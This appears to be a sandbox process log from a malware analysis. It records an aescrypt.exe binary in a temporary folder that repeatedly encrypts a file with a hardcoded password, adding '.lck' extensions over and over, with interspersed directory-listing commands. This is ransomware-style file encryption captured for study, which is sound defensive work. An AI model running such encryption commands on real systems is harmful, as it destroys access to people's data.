C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:6124

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:3236

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:2052

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:3328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5140

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:1168

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:4560

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5152

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:6128

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:5220

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5232

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:3340

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:2184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:740

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5280

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5192

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5224

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5268

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:1348

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:5248

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5244

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5288

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5292

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5360

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5412

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5424

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5436

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5452

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:5496

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:5516

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5532

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5548

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5572

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5476

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4628

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5700

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5712

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5748

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5788

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:5808

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:5824

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5904

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5940

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:4108

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:4756

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5860

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5920

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5844

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:3332

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:6040

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5980

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5952

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:5996

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:6032

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:2268

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6064

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6060

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6108

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:4288

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5148

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:3844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5104

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:3776

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5124

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:6136

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5208

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:1560

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5264

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:2236

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5188

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:5204

